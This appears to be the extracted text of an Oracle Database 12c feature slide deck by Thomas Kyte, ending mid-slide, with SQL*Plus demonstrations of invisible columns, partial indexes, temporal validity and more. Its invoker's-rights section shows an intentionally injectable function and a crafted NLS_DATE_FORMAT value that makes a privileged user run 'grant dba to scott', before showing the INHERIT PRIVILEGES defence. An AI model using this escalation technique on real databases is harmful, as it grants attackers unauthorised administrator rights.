1
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
12 More things about Oracle
Database 12c
Thomas Kyte
http://asktom.oracle.com
Small print
 The following is intended to outline our general product
direction. It is intended for information purposes only, and
may not be incorporated into any contract. It is not a
commitment to deliver any material, code, or functionality,
and should not be relied upon in making purchasing
decisions. The development, release, and timing of any
features or functionality described for Oracle’s products
remains at the sole discretion of Oracle.
3
Copyright © 2013, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 12 of the corporate presentation template
#1 Invisible
Columns
4
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> create table t
2 ( x int,
3
y int
4 )
5 /
Table created.
ops$tkyte%ORA12CR1> insert into t values ( 1, 2 );
1 row created.
5
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> alter table t add
( z int INVISIBLE );
Table altered.
6
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> desc t
Name
Null?
----------------- -------X
Y
7
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Type
-----------NUMBER(38)
NUMBER(38)
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> insert into t values ( 3, 4 );
1 row created.
8
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> select * from t;
X
Y
---------- ---------1
2
3
4
9
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> insert into t (x,y,z)
values ( 5,6,7 );
1 row created.
ops$tkyte%ORA12CR1> select x, y, z from t;
X
Y
Z
---------- ---------- ---------1
2
3
4
5
6
7
10
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invisible Columns
ops$tkyte%ORA12CR1> alter table t modify z visible;
Table altered.
ops$tkyte%ORA12CR1> select * from t;
X
Y
Z
---------- ---------- ---------1
2
3
4
5
6
7
11
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Add a column in the “middle”
ops$tkyte%ORA12CR1> create table t
2 ( a int,
3
b int,
4
d int,
5
e int
6 );
Table created.
12
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Add a column in the “middle”
ops$tkyte%ORA12CR1> alter table t modify
( d invisible, e invisible );
Table altered.
ops$tkyte%ORA12CR1> alter table t add c int;
Table altered.
ops$tkyte%ORA12CR1> alter table t modify
( d visible, e visible );
Table altered.
13
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Add a column in the “middle”
ops$tkyte%ORA12CR1> desc t
Name
Null?
----------------- -------A
B
C
D
E
14
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Type
-----------NUMBER(38)
NUMBER(38)
NUMBER(38)
NUMBER(38)
NUMBER(38)
Insert Information Protection Policy Classification from Slide 13
#2 Invokers Rights
15
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
 Invokers Rights routines ran with the privileges of the
invoker
 The invoker might be much higher privileged than the
owner of the procedure
 Can be used to ‘steal’ privileges by the owner
16
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
create or function seemingly_nice_utility
authid current_user
as
begin
execute immediate ‘grant dba to me’;
do_something_useful;
end;
If that seemingly nice routine was executed by a highly
privileged user, the owner of this nice utility would
become a DBA
17
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
ops$tkyte%ORA12CR1> create or replace
2 function injectable( p_date in date )
3 return number
4 as
5
l_sql varchar2(1000);
6
l_cnt number;
7 begin
8
dbms_output.put_line( 'enter' );
9
l_sql := '
10
select count(*) into :n from all_users
11
where created = ''' || p_date || '''';
12
13
dbms_output.put_line( l_sql );
14
execute immediate l_sql into l_cnt;
15
return l_cnt;
16 end;
Or suppose you have a SQL injectable routine…
18
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
ops$tkyte%ORA12CR1> exec dbms_output.put_line( injectable( sysdate ) )
enter
select
into
from
where
count(*)
:n
all_users
created = '28-SEP-12'
0
PL/SQL procedure successfully completed.
That is what the developer is expecting and in fact
what the developer has always seen… But…
19
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
scott%ORA12CR1> create or replace
2 function nefarious
3 return date
4 authid current_user
5 as
6
pragma autonomous_transaction;
7 begin
8
dbms_output.put_line( 'in routine' );
9
execute immediate 'grant dba to scott';
10
dbms_output.put_line( 'granted' );
11
return sysdate;
12 end;
13 /
Function created.
Scott knows this SQL injection bug exists, Scott knows
the owner of the bad code is highly privileged, Scott
has connect and resource..
20
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
scott%ORA12CR1> grant execute on nefarious to ops$tkyte;
Grant succeeded.
scott%ORA12CR1> alter session set nls_date_format = '"'' or scott.nefarious() is not
null--"';
Session altered.
scott%ORA12CR1> select sysdate from dual;
SYSDATE
-----------------------------------' or scott.nefarious() is not null--
That is a surprise to many people…
21
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
scott%ORA12CR1> select * from session_roles;
ROLE
-----------------------------CONNECT
RESOURCE
scott%ORA12CR1> exec dbms_output.put_line( ops$tkyte.injectable(sysdate) )
enter
select count(*)
into :n
from all_users
where created = '' or
scott.nefarious() is not null--'
in routine
granted
38
PL/SQL procedure successfully completed.
All we have to do is trick that highly privileged user
into running for us, just as I did here.. And then….
22
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
scott%ORA12CR1> connect scott/tiger
Connected.
scott%ORA12CR1> select * from session_roles;
ROLE
-----------------------------CONNECT
RESOURCE
DBA
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
…
XDB_SET_INVOKER
OLAP_DBA
OLAP_XS_ADMIN
PLUSTRACE
22 rows selected.
Not good…
23
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
 Two new privileges:
– INHERIT PRIVILEGES
 By default PUBLIC has INHERIT PRIVILEGES on all newly
created and upgraded user accounts
 Hence it works the same in 12c by default
 Consider
revoke inherit privileges on user username from public
– INHERIT ANY PRIVILEGES
 Use sparingly
24
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Invokers Rights
scott%PDB1> exec dbms_output.put_line( ops$tkyte.injectable(sysdate) )
enter
select count(*)
into :n
from all_users
where created = ''
or scott.nefarious() is not null--'
BEGIN dbms_output.put_line( ops$tkyte.injectable(sysdate) ); END;
*
ERROR at line 1:
ORA-06598: insufficient INHERIT PRIVILEGES privilege
ORA-06512: at "SCOTT.NEFARIOUS", line 1
ORA-06512: at "OPS$TKYTE.INJECTABLE", line 15
ORA-06512: at line 1
After issuing the revoke, the schema containing code
that is potentially SQL injectable (pretty much most
any application schema!) cannot be exploited this way
25
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#3 Multiple Same
Column Indexes
26
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Indexing
ops$tkyte%ORA11GR2> create table t ( x int, y int, z int );
Table created.
ops$tkyte%ORA11GR2> create index t_idx on t(x,y);
Index created.
ops$tkyte%ORA11GR2> create bitmap index t_idx2 on t(x,y);
create bitmap index t_idx2 on t(x,y)
*
ERROR at line 1:
ORA-01408: such column list already indexed
ops$tkyte%ORA11GR2> create bitmap index t_idx2 on t(x,y) invisible;
create bitmap index t_idx2 on t(x,y) invisible
*
ERROR at line 1:
ORA-01408: such column list already indexed
27
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Indexing
ops$tkyte%ORA12CR1> create table t ( x int, y int, z int );
Table created.
ops$tkyte%ORA12CR1> create index t_idx on t(x,y);
Index created.
ops$tkyte%ORA12CR1> create bitmap index t_idx2 on t(x,y) invisible;
Index created.
28
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Indexing
ops$tkyte%ORA12CR1> alter session set
optimizer_use_invisible_indexes=true;
Session altered.
ops$tkyte%ORA12CR1> exec dbms_stats.set_table_stats
( user, 'T', numrows => 1000000, numblks => 100000 );
PL/SQL procedure successfully completed.
29
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Indexing
ops$tkyte%ORA12CR1> set autotrace traceonly explain
ops$tkyte%ORA12CR1> select count(*) from t;
--------------------------------------------------------------------| Id | Operation
| Name
| Rows | Cost (%CPU)|
--------------------------------------------------------------------|
0 | SELECT STATEMENT
|
|
1 |
0
(0)|
|
1 | SORT AGGREGATE
|
|
1 |
|
|
2 |
BITMAP CONVERSION COUNT
|
| 1000K|
|
|
3 |
BITMAP INDEX FAST FULL SCAN| T_IDX2 |
|
|
---------------------------------------------------------------------
30
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#4 Temporal
Validity
31
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Temporal Validity
ops$tkyte%ORA12CR1> create table addresses
2 ( empno
number,
3
addr_data
varchar2(30),
4
start_date date,
5
end_date
date,
6
period for valid(start_date,end_date)
7 )
8 /
Table created.
32
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Temporal Validity
ops$tkyte%ORA12CR1> insert into addresses (empno, addr_data, start_date, end_date )
2 values ( 1234, '123 Main Street', trunc(sysdate-5), trunc(sysdate-2) );
1 row created.
ops$tkyte%ORA12CR1> insert into addresses (empno, addr_data, start_date, end_date )
2 values ( 1234, '456 Fleet Street', trunc(sysdate-1), trunc(sysdate+1) );
1 row created.
ops$tkyte%ORA12CR1> insert into addresses (empno, addr_data, start_date, end_date )
2 values ( 1234, '789 1st Ave', trunc(sysdate+2), null );
1 row created.
33
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Temporal Validity
ops$tkyte%ORA12CR1> select * from addresses;
EMPNO
---------1234
1234
1234
34
ADDR_DATA
-----------------------------123 Main Street
456 Fleet Street
789 1st Ave
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
START_DAT
--------12-MAY-13
16-MAY-13
19-MAY-13
END_DATE
--------15-MAY-13
18-MAY-13
Temporal Validity
ops$tkyte%ORA12CR1> select * from addresses as of period for valid sysdate-3;
EMPNO ADDR_DATA
START_DAT END_DATE
---------- ------------------------------ --------- --------1234 123 Main Street
12-MAY-13 15-MAY-13
ops$tkyte%ORA12CR1> select * from addresses as of period for valid sysdate;
EMPNO ADDR_DATA
START_DAT END_DATE
---------- ------------------------------ --------- --------1234 456 Fleet Street
16-MAY-13 18-MAY-13
ops$tkyte%ORA12CR1> select * from addresses as of period for valid sysdate+3;
EMPNO ADDR_DATA
START_DAT END_DATE
---------- ------------------------------ --------- --------1234 789 1st Ave
19-MAY-13
35
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#5 SQL Text
Expansion
36
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> variable x clob
ops$tkyte%ORA12CR1> begin
2
dbms_utility.expand_sql_text
3
( input_sql_text => 'select * from all_users',
4
output_sql_text => :x );
5 end;
6 /
PL/SQL procedure successfully completed.
37
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> print x
X
-------------------------------------------------------------------------------SELECT "A1"."USERNAME" "USERNAME","A1"."USER_ID" "USER_ID","A1"."CREATED" "CREAT
ED","A1"."COMMON" "COMMON" FROM (SELECT "A4"."NAME" "USERNAME","A4"."USER#" "US
ER_ID","A4"."CTIME" "CREATED",DECODE(BITAND("A4"."SPARE1",128),128,'YES','NO') "
COMMON" FROM "SYS"."USER$" "A4","SYS"."TS$" "A3","SYS"."TS$" "A2" WHERE "A4"."DA
TATS#"="A3"."TS#" AND "A4"."TEMPTS#"="A2"."TS#" AND "A4"."TYPE#"=1) "A1"
38
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> create or replace
2 function my_security_function( p_schema in varchar2,
3
p_object in varchar2 )
4 return varchar2
5 as
6 begin
7
return 'owner = USER';
8 end;
9 /
Function created.
39
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> create table my_table
2 ( data
varchar2(30),
3
OWNER
varchar2(30) default USER
4 )
5 /
Table created.
40
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> begin
2
dbms_rls.add_policy
3
( object_schema
=> user,
4
object_name
=> 'MY_TABLE',
5
policy_name
=> 'MY_POLICY',
6
function_schema => user,
7
policy_function => 'My_Security_Function',
8
statement_types => 'select, insert, update, delete' ,
9
update_check
=> TRUE );
10 end;
11 /
PL/SQL procedure successfully completed.
41
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Text Expansion
ops$tkyte%ORA12CR1> begin
2
dbms_utility.expand_sql_text
3
( input_sql_text => 'select * from my_table',
4
output_sql_text => :x );
5 end;
6 /
PL/SQL procedure successfully completed.
ops$tkyte%ORA12CR1> print x
X
-------------------------------------------------------------------------------SELECT "A1"."DATA" "DATA","A1"."OWNER" "OWNER" FROM (SELECT "A2"."DATA" "DATA",
"A2"."OWNER" "OWNER" FROM "OPS$TKYTE"."MY_TABLE" "A2" WHERE "A2"."OWNER"=USER@!)
"A1"
42
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#6 Partial Indexes
43
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Enhanced Indexing with Oracle Partitioning
Indexing prior to Oracle Database 12c
 Local indexes
 Non-partitioned or partitioned global indexes
 Usable or unusable index segments
– Non-persistent status of index, no relation to table
44
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Enhanced Indexing with Oracle Partitioning
Indexing with Oracle Database 12c
 Local indexes
 Non-partitioned or partitioned global indexes
 Usable or unusable index segments
– Non-persistent status of index, no relation to table
 Partial local and global indexes
– Partial indexing introduces table and [sub]partition level metadata
– Leverages usable/unusable state for local partitioned indexes
– Policy for partial indexing can be overwritten
45
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Enhanced Indexing with Oracle Partitioning
Partial Local and Global Indexes
Global Non-Partitioned Index
Partial indexes span only
some partitions
Full Indexing
Global Partitioned Index
Local Partitioned Index
Applicable to local and
global indexes
Indexing on
Complementary to full
indexing
Table
Partition
Table
Partition
Table
Partition
Indexing off
Partial Local Partitioned Index
Enhanced business
modeling
Partial IndexesPartial Global Partitioned Index
Partial Global Index
46
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
No Indexing
Partial Indexing
ops$tkyte%ORA12CR1> create table t
2 ( a int,
3
b int,
4
c int,
5
d int,
6
e int
7 )
8 partition by range (a)
9 (partition p1 values less than (100) indexing on,
10
partition p2 values less than (200) indexing off,
11
partition p3 values less than (300) indexing on
12 );
Table created.
47
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> begin
2
dbms_stats.set_table_stats
3
( user, 'T', numrows=> 1000000, numblks => 100000 );
4 end;
5 /
PL/SQL procedure successfully completed.
ops$tkyte%ORA12CR1> select partition_name, high_value, indexing
2
from user_tab_partitions
3
where table_name = 'T';
PARTITION_
---------P1
P2
P3
48
HIGH_VALUE
---------100
200
300
INDE
---ON
OFF
ON
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> create index t_idx_b on t(b) local
Index created.
indexing partial;
ops$tkyte%ORA12CR1> create index t_idx_c on t(c) local;
Index created.
ops$tkyte%ORA12CR1> create index t_idx_d on t(d) global indexing partial;
Index created.
ops$tkyte%ORA12CR1> create index t_idx_e on t(e) global;
Index created.
49
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> select index_name, partition_name, status
2
from user_ind_partitions
3
where index_name in ( 'T_IDX_B', 'T_IDX_C' )
4
order by 1,2;
INDEX_NAME
---------T_IDX_B
T_IDX_B
T_IDX_B
PARTITION_
---------P1
P2
P3
STATUS
-------USABLE
UNUSABLE
USABLE
T_IDX_C
T_IDX_C
T_IDX_C
P1
P2
P3
USABLE
USABLE
USABLE
6 rows selected.
50
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> select index_name, indexing, status
2
from user_indexes
3
where index_name in ( 'T_IDX_D', 'T_IDX_E' )
4
order by 1;
INDEX_NAME
---------T_IDX_D
T_IDX_E
51
INDEXIN
------PARTIAL
FULL
STATUS
-------VALID
VALID
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> select count(*) from t where b = 2;
-----------------------------------------------------------------------------------------| Id | Operation
| Name
| Rows | Pstart| Pstop |
-----------------------------------------------------------------------------------------|
0 | SELECT STATEMENT
|
|
|
|
|
|
1 | SORT AGGREGATE
|
|
1 |
|
|
|
2 |
VIEW
| VW_TE_2 |
549 |
|
|
|
3 |
UNION-ALL
|
|
|
|
|
|
4 |
PARTITION RANGE OR
|
|
524 | KEY(OR)|KEY(OR)|
|* 5 |
TABLE ACCESS BY LOCAL INDEX ROWID BATCHED| T
|
524 | KEY(OR)|KEY(OR)|
|* 6 |
INDEX RANGE SCAN
| T_IDX_B |
1 | KEY(OR)|KEY(OR)|
|
7 |
PARTITION RANGE SINGLE
|
|
25 |
2 |
2 |
|* 8 |
TABLE ACCESS FULL
| T
|
25 |
2 |
2 |
-----------------------------------------------------------------------------------------Predicate Information (identified by operation id):
--------------------------------------------------5 - filter(("T"."A"<100 OR ("T"."A">=200 AND "T"."A"<300)))
6 - access("B"=2)
8 - filter("B"=2)
52
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1>
select count(*) from t where d = 2 and a = 1;
------------------------------------------------------------------------------|Id | Operation
|Name
| Rows |Pstart|Pstop|
------------------------------------------------------------------------------| 0| SELECT STATEMENT
|
|
|
|
|
| 1| SORT AGGREGATE
|
|
1|
|
|
|* 2|
TABLE ACCESS BY GLOBAL INDEX ROWID BATCHED|T
|
100|
1 |
1|
|* 3|
INDEX RANGE SCAN
|T_IDX_D|
1|
|
|
-------------------------------------------------------------------------------
Predicate Information (identified by operation id):
--------------------------------------------------2 - filter("A"=1)
3 - access("D"=2)
53
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Partial Indexing
ops$tkyte%ORA12CR1> select count(*) from t where d = 2 and a = 101;
----------------------------------------------------------------| Id | Operation
| Name | Rows || Pstart| Pstop |
----------------------------------------------------------------|
0 | SELECT STATEMENT
|
|
||
|
|
|
1 | SORT AGGREGATE
|
|
1 ||
|
|
|
2 |
PARTITION RANGE SINGLE|
|
100 ||
2 |
2 |
|* 3 |
TABLE ACCESS FULL
| T
|
100 ||
2 |
2 |
----------------------------------------------------------------Predicate Information (identified by operation id):
--------------------------------------------------3 - filter(("D"=2 AND "A"=101))
54
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#7 Online
Operations
55
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
More Online Operations
 DROP INDEX ONLINE
 DROP CONSTRAINT ONLINE
 SET UNUSED COLUMN ONLINE
 ALTER INDEX UNUSABLE ONLINE
 ALTER INDEX [VISIBLE | INVISIBLE]
56
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Online Operations
ops$tkyte%ORA12CR1> create table t
2 ( a int,
3
b int,
4
c int,
5
d int
6 )
7 /
Table created.
ops$tkyte%ORA12CR1> insert into t values ( 1, 2, 3, 4 );
1 row created.
ops$tkyte%ORA12CR1> commit;
Commit complete.
57
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Online Operations
ops$tkyte%ORA12CR1> update t set b = 42;
1 row updated.
ops$tkyte%ORA12CR1> select * from t;
A
B
C
D
---------- ---------- ---------- ---------1
42
3
4
58
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Online Operations
ops$tkyte%ORA12CR1> declare
2
pragma autonomous_transaction;
3 begin
4
execute immediate 'alter table t set unused column d online';
5 end;
6 /
PL/SQL procedure successfully completed.
59
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Online Operations
ops$tkyte%ORA12CR1> select * from t;
A
B
C
---------- ---------- ---------1
42
3
ops$tkyte%ORA12CR1> rollback;
Rollback complete.
ops$tkyte%ORA12CR1> select * from t;
A
B
C
---------- ---------- ---------1
2
3
60
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#8 Implicit Result
Sets
61
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Implicit Result Sets
 Cursor variables have been around since 7.2
 Used to return result sets explicitly
 Some other databases return them implicitly
 Causes migration headaches
62
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Implicit Result Sets
 Two new API calls:
– PROCEDURE RETURN_RESULT
(rc IN OUT SYS_REFCURSOR, to_client IN BOOLEAN DEFAULT TRUE);
– PROCEDURE RETURN_RESULT
(rc IN OUT INTEGER, to_client IN BOOLEAN DEFAULT TRUE);
– TO_CLIENT => true, return to client layer
– TO_CLIENT=> false, return to invoker, immediate caller
63
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Implicit Result Sets
ops$tkyte%ORA12CR1> declare
2
c sys_refcursor;
3 begin
4
open c for
5
select *
6
from dept;
7
8
dbms_sql.return_result(c);
9 end;
10 /
PL/SQL procedure successfully completed.
ResultSet #1
DEPTNO
---------10
20
30
40
64
DNAME
-------------ACCOUNTING
RESEARCH
SALES
OPERATIONS
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
LOC
------------NEW YORK
DALLAS
CHICAGO
BOSTON
Insert Information Protection Policy Classification from Slide 13
Implicit Result Sets
 Two new API calls:
– PROCEDURE GET_NEXT_RESULT
(c IN INTEGER, rc OUT SYS_REFCURSOR);
– PROCEDURE GET_NEXT_RESULT
(c IN INTEGER, rc OUT INTEGER);
– For PL/SQL processing
65
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Implicit Result Sets
Connection conn = DriverManager.getConnection(jdbcURL, user, password);
try
{
Statement stmt = conn.createStatement ();
stmt.executeQuery ( “begin foo; end;” );
while (stmt.getMoreResults())
{
ResultSet rs = stmt.getResultSet();
System.out.println("ResultSet");
while (rs.next())
{
/* get results */
}
}
}
66
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#9 Easier Reorgs
67
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Easier Reorgs
In a single command you can…
 Move table tablespaces
 Move index tablespaces
 Move lob tablespaces
 Implement table compression
 Implement index key compression
 Implement lob compression
 Convert to securelfile
68
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Easier Reorgs
ops$tkyte%ORA12CR1> create table t
2 tablespace users
3 as
4 select *
5
from all_objects;
Table created.
ops$tkyte%ORA12CR1> create index t_idx on t(object_name);
Index created.
ops$tkyte%ORA12CR1> alter table t add constraint
t_pk primary key(object_id);
Table altered.
69
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Easier Reorgs
ops$tkyte%ORA12CR1> select index_name, status
2
from user_indexes
3
where table_name = 'T';
INDEX_NAME
---------T_PK
T_IDX
STATUS
---------VALID
VALID
ops$tkyte%ORA12CR1> exec show_space( 'T' );
…
Full Blocks
.....................
Total Blocks............................
Total MBytes............................
…
70
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
1,373
1,408
11
Easier Reorgs
ops$tkyte%ORA12CR1> begin
2 dbms_redefinition.redef_table
3 ( uname
=> user,
4
tname
=> 'T',
5
table_compression_type => 'row store compress advanced',
6
table_part_tablespace => 'TEST' );
7 end;
8 /
PL/SQL procedure successfully completed.
71
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Easier Reorgs
ops$tkyte%ORA12CR1> select index_name, status
2
from user_indexes
3
where table_name = 'T';
INDEX_NAME
---------T_PK
T_IDX
STATUS
---------VALID
VALID
ops$tkyte%ORA12CR1> exec show_space( 'T' );
…
Full Blocks
.....................
Total Blocks............................
Total MBytes............................
…
72
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
382
512
4
#10 Improved
Introspection
73
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Improved Introspection
 Before 12.1, you used three functions in the
DBMS_Utility package
• Format_Call_Stack()
• Format_Error_Stack()
• Format_Error_Backtrace()
 New in 12.1
• The package UTL_Call_Stack solves the
same problem properly
74
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Improved Introspection
package body Pkg is
procedure p is
procedure q is
procedure r is
procedure p is
begin
Print_Call_Stack();
end p;
begin
p();
end r;
begin
r();
end q;
begin
q();
end p;
end Pkg;
75
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Improved Introspection
procedure Print_Call_Stack authid Definer is
Depth pls_integer := UTL_Call_Stack.Dynamic_Depth();
begin
DBMS_Output.Put_Line(DBMS_Utility.Format_Call_Stack());
end;
----- PL/SQL Call Stack ----object
line object
handle
number name
0x631f6e88
12 procedure USR.PRINT_CALL_STACK
0x68587700
7 package body USR.PKG
0x68587700
10 package body USR.PKG
0x68587700
13 package body USR.PKG
0x68587700
16 package body USR.PKG
0x69253ca8
1 anonymous block
76
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Improved Introspection
procedure Print_Call_Stack authid Definer is
Depth pls_integer := UTL_Call_Stack.Dynamic_Depth();
begin
for j in reverse 2..Depth loop
DBMS_Output.Put_Line(
(j - 1)||
To_Char(UTL_Call_Stack.Unit_Line(j), '99')||
UTL_Call_Stack.Concatenate_Subprogram
UTL_Call_Stack.Subprogram(j)));
end loop;
end;
5
4
3
2
1
77
1
16
13
10
7
__anonymous_block
PKG.P
PKG.P.Q
PKG.P.Q.R
PKG.P.Q.R.P
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
#11 SQL made for
migration
78
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Expanded Syntax
 Cross Apply
 Outer Apply
 Lateral
79
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
Expanded Syntax
ops$tkyte%ORA12CR1> select d.deptno, d.dname, e2.ename
2
from dept d cross apply (select ename
3
from emp e
4
where e.deptno = d.deptno) e2
5
where d.deptno in ( 10, 40 )
6
order by 1, 2
7 /
DEPTNO
---------10
10
10
80
DNAME
-------------ACCOUNTING
ACCOUNTING
ACCOUNTING
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
ENAME
---------CLARK
MILLER
KING
Insert Information Protection Policy Classification from Slide 13
Expanded Syntax
ops$tkyte%ORA12CR1> select d.deptno, d.dname, e2.ename
2
from dept d outer apply (select ename
3
from emp e
4
where e.deptno = d.deptno) e2
5
where d.deptno in ( 10, 40 )
6
order by 1, 2
7 /
DEPTNO
---------10
10
10
40
81
DNAME
-------------ACCOUNTING
ACCOUNTING
ACCOUNTING
OPERATIONS
